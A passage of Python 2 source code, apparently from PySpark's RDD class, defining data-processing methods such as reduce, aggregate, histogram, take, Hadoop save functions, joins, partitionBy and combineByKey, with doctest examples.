>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions)
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
['1', '2', '', '3']
"""
def func(iterator):
pipe = Popen(
shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
out.write(str(obj).rstrip('\n') + '\n')
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip('\n') for x in iter(pipe.stdout.readline, ''))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
return iter([])
self.mapPartitions(processPartition).count() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
def func(it):
r = f(it)
try:
return iter(r)
except TypeError:
return iter([])
self.mapPartitions(func).count() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with SCCallSiteSync(self.context) as css:
bytesInJava = self._jrdd.collect().iterator()
return list(self._collect_iterator_through_file(bytesInJava))
def _collect_iterator_through_file(self, iterator):
# Transferring lots of data through Py4J can be slow because
# socket.readline() is inefficient. Instead, we'll dump the data to a
# file and read it back.
tempFile = NamedTemporaryFile(delete=False, dir=self.ctx._temp_dir)
tempFile.close()
self.ctx._writeToFile(iterator, tempFile.name)
# Read the data into Python and deserialize it:
with open(tempFile.name, 'rb') as tempFile:
for item in self._jrdd_deserializer.load_stream(tempFile):
yield item
os.unlink(tempFile.name)
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
>>> sc.parallelize([]).reduce(add)
Traceback (most recent call last):
...
ValueError: Can not reduce() empty RDD
"""
def func(iterator):
iterator = iter(iterator)
try:
initial = next(iterator)
except StopIteration:
return
yield reduce(f, iterator, initial)
vals = self.mapPartitions(func).collect()
if vals:
return reduce(f, vals)
raise ValueError("Can not reduce() empty RDD")
def treeReduce(self, f, depth=2):
"""
Reduces the elements of this RDD in a multi-level tree pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeReduce(add)
-5
>>> rdd.treeReduce(add, 1)
-5
>>> rdd.treeReduce(add, 2)
-5
>>> rdd.treeReduce(add, 5)
-5
>>> rdd.treeReduce(add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
zeroValue = None, True # Use the second entry to indicate whether this is a dummy value.
def op(x, y):
if x[1]:
return y
elif y[1]:
return x
else:
return f(x[0], y[0]), False
reduced = self.map(lambda x: (x, False)).treeAggregate(zeroValue, op, op, depth)
if reduced[1]:
raise ValueError("Cannot reduce empty RDD.")
return reduced[0]
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into
an U and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
return self.mapPartitions(func).fold(zeroValue, combOp)
def treeAggregate(self, zeroValue, seqOp, combOp, depth=2):
"""
Aggregates the elements of this RDD in a multi-level tree
pattern.
:param depth: suggested depth of the tree (default: 2)
>>> add = lambda x, y: x + y
>>> rdd = sc.parallelize([-5, -4, -3, -2, -1, 1, 2, 3, 4], 10)
>>> rdd.treeAggregate(0, add, add)
-5
>>> rdd.treeAggregate(0, add, add, 1)
-5
>>> rdd.treeAggregate(0, add, add, 2)
-5
>>> rdd.treeAggregate(0, add, add, 5)
-5
>>> rdd.treeAggregate(0, add, add, 10)
-5
"""
if depth < 1:
raise ValueError("Depth cannot be smaller than 1 but got %d." % depth)
if self.getNumPartitions() == 0:
return zeroValue
def aggregatePartition(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
partiallyAggregated = self.mapPartitions(aggregatePartition)
numPartitions = partiallyAggregated.getNumPartitions()
scale = max(int(ceil(pow(numPartitions, 1.0 / depth))), 2)
# If creating an extra level doesn't help reduce the wall-clock time, we stop the tree
# aggregation.
while numPartitions > scale + numPartitions / scale:
numPartitions /= scale
curNumPartitions = numPartitions
def mapPartition(i, iterator):
for obj in iterator:
yield (i % curNumPartitions, obj)
partiallyAggregated = partiallyAggregated \
.mapPartitionsWithIndex(mapPartition) \
.reduceByKey(combOp, curNumPartitions) \
.values()
return partiallyAggregated.reduce(combOp)
def max(self, key=None):
"""
Find the maximum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([1.0, 5.0, 43.0, 10.0])
>>> rdd.max()
43.0
>>> rdd.max(key=str)
5.0
"""
if key is None:
return self.reduce(max)
return self.reduce(lambda a, b: max(a, b, key=key))
def min(self, key=None):
"""
Find the minimum item in this RDD.
:param key: A function used to generate key for comparing
>>> rdd = sc.parallelize([2.0, 5.0, 43.0, 10.0])
>>> rdd.min()
2.0
>>> rdd.min(key=str)
10.0
"""
if key is None:
return self.reduce(min)
return self.reduce(lambda a, b: min(a, b, key=key))
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def histogram(self, buckets):
"""
Compute a histogram using the provided buckets. The buckets
are all open to the right except for the last which is closed.
e.g. [1,10,20,50] means the buckets are [1,10) [10,20) [20,50],
which means 1<=x<10, 10<=x<20, 20<=x<=50. And on the input of 1
and 50 we would have a histogram of 1,0,1.
If your histogram is evenly spaced (e.g. [0, 10, 20, 30]),
this can be switched from an O(log n) inseration to O(1) per
element(where n = # buckets).
Buckets must be sorted and not contain any duplicates, must be
at least two elements.
If `buckets` is a number, it will generates buckets which are
evenly spaced between the minimum and maximum of the RDD. For
example, if the min value is 0 and the max is 100, given buckets
as 2, the resulting buckets will be [0,50) [50,100]. buckets must
be at least 1 If the RDD contains infinity, NaN throws an exception
If the elements in RDD do not vary (max == min) always returns
a single bucket.
It will return an tuple of buckets and histogram.
>>> rdd = sc.parallelize(range(51))
>>> rdd.histogram(2)
([0, 25, 50], [25, 26])
>>> rdd.histogram([0, 5, 25, 50])
([0, 5, 25, 50], [5, 20, 26])
>>> rdd.histogram([0, 15, 30, 45, 60]) # evenly spaced buckets
([0, 15, 30, 45, 60], [15, 15, 15, 6])
>>> rdd = sc.parallelize(["ab", "ac", "b", "bd", "ef"])
>>> rdd.histogram(("a", "b", "c"))
(('a', 'b', 'c'), [2, 2])
"""
if isinstance(buckets, (int, long)):
if buckets < 1:
raise ValueError("number of buckets must be >= 1")
# filter out non-comparable elements
def comparable(x):
if x is None:
return False
if type(x) is float and isnan(x):
return False
return True
filtered = self.filter(comparable)
# faster than stats()
def minmax(a, b):
return min(a[0], b[0]), max(a[1], b[1])
try:
minv, maxv = filtered.map(lambda x: (x, x)).reduce(minmax)
except TypeError as e:
if " empty " in str(e):
raise ValueError("can not generate buckets from empty RDD")
raise
if minv == maxv or buckets == 1:
return [minv, maxv], [filtered.count()]
try:
inc = (maxv - minv) / buckets
except TypeError:
raise TypeError("Can not generate buckets with non-number in RDD")
if isinf(inc):
raise ValueError("Can not generate buckets with infinite value")
# keep them as integer if possible
if inc * buckets != maxv - minv:
inc = (maxv - minv) * 1.0 / buckets
buckets = [i * inc + minv for i in range(buckets)]
buckets.append(maxv) # fix accumulated error
even = True
elif isinstance(buckets, (list, tuple)):
if len(buckets) < 2:
raise ValueError("buckets should have more than one value")
if any(i is None or isinstance(i, float) and isnan(i) for i in buckets):
raise ValueError("can not have None or NaN in buckets")
if sorted(buckets) != list(buckets):
raise ValueError("buckets should be sorted")
if len(set(buckets)) != len(buckets):
raise ValueError("buckets should not contain duplicated values")
minv = buckets[0]
maxv = buckets[-1]
even = False
inc = None
try:
steps = [buckets[i + 1] - buckets[i] for i in range(len(buckets) - 1)]
except TypeError:
pass # objects in buckets do not support '-'
else:
if max(steps) - min(steps) < 1e-10: # handle precision errors
even = True
inc = (maxv - minv) / (len(buckets) - 1)
else:
raise TypeError("buckets should be a list or tuple or number(int or long)")
def histogram(iterator):
counters = [0] * len(buckets)
for i in iterator:
if i is None or (type(i) is float and isnan(i)) or i > maxv or i < minv:
continue
t = (int((i - minv) / inc) if even
else bisect.bisect_right(buckets, i) - 1)
counters[t] += 1
# add last two together
last = counters.pop()
counters[-1] += last
return [counters]
def mergeCounters(a, b):
return [i + j for i, j in zip(a, b)]
return buckets, self.mapPartitions(histogram).reduce(mergeCounters)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.iteritems():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as
specified by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self._jrdd.partitions().size()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p, True)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all. Note that an RDD
may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self._jrdd.partitions().size() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).collect())
[1, 2, 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
def saveAsTextFile(self, path):
"""
Save this RDD as a text file, using string representations of elements.
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, basestring):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda (k, v): k)
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda (k, v): v)
def reduceByKey(self, func, numPartitions=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.iteritems():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> set(sets[0]).intersection(set(sets[1]))
set([])
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in buckets.keys():
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = (size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(batch / 1.5, 1)
c = 0
for split, items in buckets.iteritems():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
partitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = pairRDD.partitionBy(partitioner).values()
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
# This is required so that id(partitionFunc) remains unique,
# even if partitionFunc is a lambda:
rdd._partitionFunc = partitionFunc
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
spill = (self.ctx._conf.get("spark.shuffle.spill", 'True').lower()
== 'true')
memory = _parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m"))
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeValues(iterator)
return merger.iteritems()
locally_combined = self.mapPartitions(combineLocally)
shuffled = locally_combined.partitionBy(numPartitions)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer) \
if spill else InMemoryMerger(agg)
merger.mergeCombiners(iterator)
return merger.iteritems()
return shuffled.mapPartitions(_mergeCombiners, True)
